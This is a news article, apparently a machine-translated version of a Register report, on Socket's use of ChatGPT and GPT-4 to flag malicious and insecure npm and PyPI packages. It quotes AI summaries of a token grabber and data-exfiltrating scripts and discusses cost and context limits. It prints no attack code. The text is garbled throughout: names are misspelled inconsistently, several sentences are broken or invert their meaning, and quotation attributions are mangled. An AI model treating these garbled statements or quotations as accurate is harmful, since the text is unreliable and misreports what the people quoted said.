Exclusive Machine learning models are unreliable, but that doesn’t stop them from being useful at times.
According to CEO Feross Aboukhadijeh, the results have been surprisingly good. “It worked better than expected,” he said register on mail. “Currently, I’m working on hundreds of vulnerabilities and malware packages, and I’m in a hurry to report them as soon as possible.”
According to Aboukhadijeh, Socket has identified 227 vulnerabilities, all using ChatGPT. Vulnerabilities fall into different categories and have no common characteristics.
register A number of public package examples were provided that demonstrated malicious or insecure behavior, including information disclosure, SQL injection, hardcoded credentials, potential privilege escalation, and backdoors.
I’ve been asked not to share some examples because they haven’t been removed yet, but here are some examples that have already been addressed.
mathjs-min“Socket reported this to npm and it has been removed,” said Abokhadijeh. “This was pretty bad.”
- AI Analysis: “This script contains a mismatched token grabber function that poses a serious security risk. It steals user tokens and sends them to an external server. This is malicious behavior.”
“There are also some interesting effects, such as that humans may be persuaded, but AI marks them as risks,” Abokhadijeh added.
“These decisions are somewhat subjective, but the AI will not deter comments that claim that dangerous parts of code are inherently benign. It even contains humorous comments.”
- AI Analysis: “The script collects information such as hostname, username, home directory, current working directory, etc. and sends it to a remote server. The author claims it’s intended for bug bounty purposes, but This behavior can still pose a privacy risk.This script also contains blocking operations that can cause performance issues and unresponsiveness.”
Aboukhadijeh explained that the software packages in these registries are huge, and it’s difficult to create rules that fully capture the nuances of every file, script, and configuration data bit. Rules tend to be fragile, often producing too much detail or overlooking what an experienced human reviewer can grasp.
While applying human analysis to the entire corpus of package registries (~1.3 million on npm and ~450,000 on PyPI) is impractical, machine learning models help human reviewers focus on more questionable code. You can pick up some of the slack by allowing modules.
“Socket analyzes all npm and PyPI packages with AI-based source code analysis using ChatGPT,” said Abokhadijeh.
“If we find a problem with a package, we flag it for review and ask ChatGPT to briefly describe our findings. Please gather more feedback on this feature.”
Courtesy of Abu Kadige register Use a sample report from the ChatGPT helper to identify dangerous, but definitely not malicious, behavior. In this case, the machine learning model provided the assessment: “This script collects sensitive information about the user’s system, such as username, hostname, DNS servers, package information, etc., and sends it to an external server.”
Screenshot of the Socket Security Scanner’s ChatGPT report – click to enlarge
What the ChatGPT-based Socket Advisory looks like … Click to enlarge
According to Abokhadijeh, Socket is designed to help developers make informed decisions about risk without getting in the way of their work. So every install he warns about scripts (a common attack vector) can create too much noise. Analyzing these scripts with large language models will ring alarm bells and help developers recognize real problems. And these models are more capable.
“GPT-4 is a game changer and can replace static analysis tools as long as all relevant code is in scope,” said Abokhadijeh.
“Theoretically, if AI is presented with the right data, there can be no undetectable vulnerabilities or security issues. Getting the right data into the AI in the right format without having to do anything :)” – Using these models can be costly, as shown below.
“Sockets provide additional data and processes that help guide GPT-4 to do correct analysis, with GPT’s own limits on number of characters, references between files, functions that can be accessed, prioritization of analysis, etc. I am,” he said. .
“Our traditional tools are actually helping improve AI in the same way they help humans. You can benefit from another tool that you can run on your own.”
This is not to say that large language models cannot be harmful and should not be scrutinized more than ever. It is possible and should be. Rather, Socket’s experience suggests that ChatGPT and similar models, despite all their rough edges, are particularly vulnerable to potential harm in false security recommendations rather than discriminatory adoption decisions or toxic recipe endorsements. I have confirmed that it is really useful in some cases.
As open source developer Simon Willison said in a recent blog post, these large language models allow him to be more ambitious with his projects.
“As a seasoned developer, ChatGPT (and GitHub Copilot) have saved me a lot of ‘getting things done’ time,” Willison said. “Not only does this make me more productive, it lowers the bar on whether a project is worth investing time into.”
Aboukhadijeh admits that ChatGPT is not or is not perfect. It doesn’t handle large files very well due to its limited context window, and it struggles to understand highly obfuscated code, much like human reviewers do. However, in both situations, more focused scrutiny is required, so the limitations of the model are less meaningful.
Aboukhadijeh makes these models more resistant to rapid injection attacks and better able to handle cross-file analysis (where pieces of malicious activity can be spread across multiple files). said that more work needs to be done to
“If malicious behavior is widespread enough, it becomes difficult to get all the context into the AI at once,” he explained. “This is the basis of all Transformer models, which have finite token limits. Our tools try to work within these limits by bringing different data into the AI context.”
Integrating ChatGPT and its successors (docs here and here) into socket scanners also proved to be a financial challenge. According to Abokhadijeh, one of LLM’s biggest obstacles is the cost of deployment.
“For us, these costs proved to be the most difficult part of implementing ChatGPT on Socket,” he said. “Initial projections estimated that a full scan of the npm registry would cost the API use millions of dollars. We were able to bring it down to a more sustainable value.”
These costs proved to be the most difficult part of implementing ChatGPT on Sockets.
Asked whether client-side execution would be a way to reduce the cost of running these models, Aboukhadijeh added that while it doesn’t seem likely at the moment, the AI landscape is changing rapidly.
“The main challenge with on-premises systems is not the frequent need to update the models, but the costs associated with running these models at scale,” he said. “To get the full benefits of AI security, it is ideal to use the largest possible model.”
“Small models like GPT-3 and LLaMA have some advantages, but they are not intelligent enough to consistently detect the most sophisticated malware. There are significant costs involved, but we have put a lot of effort into increasing efficiency to reduce these costs, and although we cannot reveal all the details, we are currently developing them for this purpose. We have patents pending on some of our technology, and we continue to work on further improvements and cost reductions.”
Due to the cost, Socket has prioritized making the AI Advisory available to paying customers, but the company also makes the basic version available through its website.
“By centralizing this analysis in Socket, we can amortize the cost of running AI analysis across all shared open source dependencies, providing maximum benefit to our community and protecting our customers at the lowest possible cost.” I believe,” said Abokhadijeh.®